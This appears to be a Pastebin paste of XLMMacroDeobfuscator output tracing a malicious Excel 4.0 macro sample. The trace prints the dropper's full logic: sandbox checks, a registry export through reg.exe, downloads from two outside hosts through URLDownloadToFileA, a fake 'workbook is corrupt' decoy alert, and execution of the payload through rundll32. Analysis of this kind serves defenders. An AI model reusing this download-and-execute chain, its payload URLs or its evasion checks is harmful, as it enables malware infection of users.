Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\ea0268aed69cd2bd3a13c07752fa45be8ff07a0fe78b8f7b6b381f1476ad8068.xls
- [Loading Cells]
- auto_open: auto_open->9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!$FH$49024
- [Starting Deobfuscation]
- CELL:FH49024 , FullEvaluation , SET.VALUE(GZ34749,236)
- CELL:FH49025 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AB31575)
- CELL:AB31575 , FullEvaluation , SET.VALUE(GA65402,211.875)
- CELL:AB31576 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CW39913)
- CELL:CW39913 , FullEvaluation , SET.VALUE(EV50779,334)
- CELL:CW39914 , FullEvaluation , GOTO(BT20806)
- CELL:BT20806 , FullEvaluation , SET.VALUE(HC57576,302)
- CELL:BT20807 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HF25027)
- CELL:HF25027 , FullEvaluation , SET.VALUE(BV11787,117)
- CELL:HF25028 , FullEvaluation , GOTO(U64895)
- CELL:U64895 , FullEvaluation , SET.VALUE(DJ10105,116)
- CELL:U64896 , FullEvaluation , GOTO(AZ26863)
- CELL:AZ26863 , FullEvaluation , SET.VALUE(DN42674,-35.75)
- CELL:AZ26864 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BM901)
- CELL:BM901 , FullEvaluation , SET.VALUE(AO12768,-1027.5)
- CELL:BM902 , FullEvaluation , GOTO(P38128)
- CELL:P38128 , FullEvaluation , SET.VALUE(AZ43693,-164)
- CELL:P38129 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BL29717)
- CELL:BL29717 , FullEvaluation , SET.VALUE(CK27344,-435)
- CELL:BL29718 , FullEvaluation , GOTO(FI19111)
- CELL:FI19111 , FullEvaluation , SET.VALUE(EX42303,290)
- CELL:FI19112 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CK8252)
- CELL:CK8252 , FullEvaluation , SET.VALUE(IC64694,-764)
- CELL:CK8253 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HJ54663)
- CELL:HJ54663 , FullEvaluation , SET.VALUE(E44515,-468)
- CELL:HJ54664 , FullEvaluation , GOTO(GD55986)
- CELL:GD55986 , FullEvaluation , SET.VALUE(FK63376,486)
- CELL:GD55987 , FullEvaluation , GOTO(HB43627)
- CELL:HB43627 , FullEvaluation , SET.VALUE(EL29677,40.25)
- CELL:HB43628 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!EN29618)
- CELL:EN29618 , FullEvaluation , SET.VALUE(IU47295,400)
- CELL:EN29619 , FullEvaluation , GOTO(U45293)
- CELL:U45293 , FullEvaluation , SET.VALUE(BA22911,-154.5)
- CELL:U45294 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CV54814)
- CELL:CV54814 , FullEvaluation , SET.VALUE(IF27108,196)
- CELL:CV54815 , FullEvaluation , GOTO(EO28948)
- CELL:EO28948 , FullEvaluation , SET.VALUE(BF54715,72)
- CELL:EO28949 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!DL56436)
- CELL:DL56436 , FullEvaluation , SET.VALUE(S9586,397)
- CELL:DL56437 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!GO5178)
- CELL:GO5178 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",GE58394)
- CELL:GO5179 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!GG53123)
- CELL:GG53123 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",AC38734)
- CELL:GG53124 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IQ65374)
- CELL:IQ65374 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",CF32458)
- CELL:IQ65375 , FullEvaluation , GOTO(IU37347)
- CELL:IU37347 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",GH50257)
- CELL:IU37348 , FullEvaluation , GOTO(GZ6455)
- CELL:GZ6455 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)",IH33823)
- CELL:GZ6456 , FullEvaluation , GOTO(IE48886)
- CELL:IE48886 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)",DE64447)
- CELL:IE48887 , FullEvaluation , GOTO(DL53198)
- CELL:DL53198 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",IB38985)
- CELL:DL53199 , FullEvaluation , GOTO(DQ63210)
- CELL:DQ63210 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",FC47525)
- CELL:DQ63211 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IH10377)
- CELL:IH10377 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,CLOSE(TRUE))",IA57959)
- CELL:IH10378 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HS61022)
- CELL:HS61022 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",DC59054)
- CELL:HS61023 , FullEvaluation , GOTO(HH5373)
- CELL:HH5373 , FullEvaluation , FORMULA("=""C:\Users\Public\62sg03z.reg""",IC44493)
- CELL:HH5374 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!DF39200)
- CELL:DF39200 , FullEvaluation , FORMULA("=R[44281]C[11]&GET.WORKSPACE(2)&""\Excel\Security ""&R[29720]C[141]&"" /y""",CR14773)
- CELL:DF39201 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!ED24752)
- CELL:ED24752 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",G59977)
- CELL:ED24753 , FullEvaluation , GOTO(ED40112)
- CELL:ED40112 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[57410]C[-93],R[12206]C[-4],0,5)",CV2567)
- CELL:ED40113 , FullEvaluation , GOTO(HI45029)
- CELL:HI45029 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[7961]C[193])))",AR36532)
- CELL:HI45030 , FullEvaluation , GOTO(CA62811)
- CELL:CA62811 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",AR36533)
- CELL:CA62812 , FullEvaluation , GOTO(ID59587)
- CELL:ID59587 , FullEvaluation , FORMULA("=NEXT()",AR36534)
- CELL:ID59588 , FullEvaluation , GOTO(GW10338)
- CELL:GW10338 , FullEvaluation , FORMULA("=""http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php""",HB20930)
- CELL:GW10339 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CB54789)
- CELL:CB54789 , FullEvaluation , FORMULA("=""http://ekhobrand.com/wp-smart.php""",CK63296)
- CELL:CB54790 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IG57205)
- CELL:IG57205 , FullEvaluation , FORMULA("=FOPEN(R[28537]C[-9])",IL15956)
- CELL:IG57206 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HY35963)
- CELL:HY35963 , FullEvaluation , FORMULA("=FPOS(R[-26252]C[68],215)",FV42208)
- CELL:HY35964 , FullEvaluation , GOTO(CG48001)
- CELL:CG48001 , FullEvaluation , FORMULA("=FREAD(R[-6791]C[39],255)",GY22747)
- CELL:CG48002 , FullEvaluation , GOTO(EA7566)
- CELL:EA7566 , FullEvaluation , FORMULA("=FCLOSE(R[-27498]C[33])",HE43454)
- CELL:EA7567 , FullEvaluation , GOTO(BO62857)
- CELL:BO62857 , FullEvaluation , FORMULA("=FILE.DELETE(R[-966]C[-17])",IT45459)
- CELL:BO62858 , FullEvaluation , GOTO(HT60327)
- CELL:HT60327 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-12384]C[103])),CLOSE(FALSE),)",CZ35131)
- CELL:HT60328 , FullEvaluation , GOTO(GS13611)
- CELL:GS13611 , FullEvaluation , FORMULA("=""C:\Users\Public\hhEMc6.html""",HV31307)
- CELL:GS13612 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IP29050)
- CELL:IP29050 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-18278]C[-51],R[-19429]C[95],0,0)",EE50736)
- CELL:IP29051 , FullEvaluation , GOTO(DW56142)
- CELL:DW56142 , FullEvaluation , FORMULA("=FILES(R[29810]C[86])",EN1497)
- CELL:DW56143 , FullEvaluation , GOTO(M62520)
- CELL:M62520 , FullEvaluation , FORMULA("=IF(ISERROR(R[818]C[81]),CLOSE(FALSE),)",BK679)
- CELL:M62521 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!Y47838)
- CELL:Y47838 , FullEvaluation , FORMULA("=""C:\Users\Public\nzjB.html""",GO34148)
- CELL:Y47839 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BF49093)
- CELL:BF49093 , FullEvaluation , FORMULA("=R[24818]C[106]&"",DllRegisterServer""",CM9330)
- CELL:BF49094 , FullEvaluation , GOTO(IQ22082)
- CELL:IQ22082 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[10964]C[104],R[24182]C[91],0,0)",DB9966)
- CELL:IQ22083 , FullEvaluation , GOTO(IL4450)
- CELL:IL4450 , FullEvaluation , FORMULA("=FILES(R[-21011]C[169])",AB55159)
- CELL:IL4451 , FullEvaluation , GOTO(CW20424)
- CELL:CW20424 , FullEvaluation , FORMULA("=IF(ISERROR(R[21824]C[-126]),,RUN(R[186]C[-126]))",EX33335)
- CELL:CW20425 , FullEvaluation , GOTO(L47582)
- CELL:L47582 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[32087]C[-126],R[2939]C[-18],0,0)",HG31209)
- CELL:L47583 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!K13075)
- CELL:K13075 , FullEvaluation , FORMULA("=ALERT(R[24873]C[159],2)",AB33521)
- CELL:K13076 , FullEvaluation , GOTO(FV25832)
- CELL:FV25832 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[30329]C[-187],R[925]C[-125],0,5)",HH8405)
- CELL:FV25833 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BE2550)
- CELL:BE2550 , FullEvaluation , FORMULA("=CLOSE(FALSE)",B23780)
- CELL:BE2551 , FullEvaluation , GOTO(GE58394)
- CELL:GE58394 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:GE58395 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AC38734)
- CELL:AC38734 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:AC38735 , FullEvaluation , GOTO(CF32458)
- CELL:CF32458 , FullEvaluation , "https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates"
- CELL:CF32459 , FullEvaluation , GOTO(GH50257)
- CELL:GH50257 , PartialEvaluation , APP.MAXIMIZE()
- CELL:GH50258 , FullEvaluation , GOTO(IH33823)
- CELL:IH33823 , FullEvaluation , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
- CELL:IH33824 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!DE64447)
- CELL:DE64447 , FullEvaluation , IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
- CELL:DE64448 , FullEvaluation , GOTO(IB38985)
- CELL:IB38985 , FullEvaluation , IF(GET.WORKSPACE(19),,CLOSE(TRUE))
- CELL:IB38986 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!FC47525)
- CELL:FC47525 , FullEvaluation , IF(GET.WORKSPACE(42),,CLOSE(TRUE))
- CELL:FC47526 , FullEvaluation , GOTO(IA57959)
- CELL:IA57959 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
- CELL:IA57959 , FullEvaluation , [TRUE]
- CELL:IA57960 , FullEvaluation , GOTO(DC59054)
- CELL:DC59054 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\"
- CELL:DC59055 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IC44493)
- CELL:IC44493 , FullEvaluation , "C:\Users\Public\62sg03z.reg"
- CELL:IC44494 , FullEvaluation , GOTO(CR14773)
- CELL:CR14773 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security C:\Users\Public\62sg03z.reg /y"
- CELL:CR14774 , FullEvaluation , GOTO(G59977)
- CELL:G59977 , FullEvaluation , "C:\Windows\system32\reg.exe"
- CELL:G59978 , FullEvaluation , GOTO(CV2567)
- CELL:CV2567 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security C:\Users\Public\62sg03z.reg /y",0,5)
- CELL:CV2568 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AR36532)
- CELL:AR36532 , PartialEvaluation , WHILE(ISERROR(FILES(R[7961]C[193])))
- CELL:AR36535 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HB20930)
- CELL:HB20930 , FullEvaluation , "http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php"
- CELL:HB20931 , FullEvaluation , GOTO(CK63296)
- CELL:CK63296 , FullEvaluation , "http://ekhobrand.com/wp-smart.php"
- CELL:CK63297 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IL15956)
- CELL:IL15956 , PartialEvaluation , FOPEN("C:\Users\Public\62sg03z.reg")
- CELL:IL15957 , FullEvaluation , GOTO(FV42208)
- CELL:FV42208 , PartialEvaluation , FPOS("FOPEN(""C:\Users\Public\62sg03z.reg"")",215)
- CELL:FV42209 , FullEvaluation , GOTO(GY22747)
- CELL:GY22747 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\62sg03z.reg"")",255)
- CELL:GY22748 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HE43454)
- CELL:HE43454 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\62sg03z.reg"")")
- CELL:HE43455 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!IT45459)
- CELL:IT45459 , PartialEvaluation , FILE.DELETE("C:\Users\Public\62sg03z.reg")
- CELL:IT45460 , FullEvaluation , GOTO(CZ35131)
- CELL:CZ35131 , FullBranching , IF(ISNUMBER(SEARCH("0001",R[-12384]C[103])),CLOSE(FALSE),)
- CELL:CZ35131 , End , [TRUE] CLOSE(FALSE)
- CELL:CZ35131 , FullEvaluation , [FALSE]
- CELL:CZ35132 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HV31307)
- CELL:HV31307 , FullEvaluation , "C:\Users\Public\hhEMc6.html"
- CELL:HV31308 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!EE50736)
- CELL:EE50736 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\hhEMc6.html",0,0)
- CELL:EE50737 , FullEvaluation , GOTO(EN1497)
- CELL:EN1497 , PartialEvaluation , FILES("C:\Users\Public\hhEMc6.html")
- CELL:EN1498 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!BK679)
- CELL:BK679 , FullBranching , IF(ISERROR(R[818]C[81]),CLOSE(FALSE),)
- CELL:BK679 , End , [TRUE] CLOSE(FALSE)
- CELL:BK679 , FullEvaluation , [FALSE]
- CELL:BK680 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!GO34148)
- CELL:GO34148 , FullEvaluation , "C:\Users\Public\nzjB.html"
- CELL:GO34149 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!CM9330)
- CELL:CM9330 , FullEvaluation , "C:\Users\Public\nzjB.html,DllRegisterServer"
- CELL:CM9331 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!DB9966)
- CELL:DB9966 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://xn--80agatbmcgncccbd9andd6w.xn--p1ai/wp-smart.php","C:\Users\Public\nzjB.html",0,0)
- CELL:DB9967 , FullEvaluation , GOTO(AB55159)
- CELL:AB55159 , PartialEvaluation , FILES("C:\Users\Public\nzjB.html")
- CELL:AB55160 , FullEvaluation , GOTO(EX33335)
- CELL:EX33335 , FullBranching , IF(ISERROR(R[21824]C[-126]),,RUN(R[186]C[-126]))
- CELL:EX33335 , FullEvaluation , [TRUE]
- CELL:EX33336 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HG31209)
- CELL:HG31209 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://ekhobrand.com/wp-smart.php","C:\Users\Public\nzjB.html",0,0)
- CELL:HG31210 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AB33521)
- CELL:AB33521 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
- CELL:AB33522 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HH8405)
- CELL:HH8405 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\nzjB.html,DllRegisterServer",0,5)
- CELL:HH8406 , FullEvaluation , GOTO(B23780)
- CELL:B23780 , End , CLOSE(FALSE)
- CELL:EX33335 , FullEvaluation , [FALSE] RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!AB33521)
- CELL:AB33521 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
- CELL:AB33522 , FullEvaluation , RUN(9yCOfmM5I1anZFFeFYCJyKsJGrJ7b9!HH8405)
- CELL:HH8405 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\nzjB.html,DllRegisterServer",0,5)
- CELL:HH8406 , FullEvaluation , GOTO(B23780)
- CELL:B23780 , End , CLOSE(FALSE)
- CELL:IA57959 , End , [FALSE] CLOSE(TRUE)
- [Day of Month] 5
- [END of Deobfuscation]
- time elapsed: 5.007885694503784
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement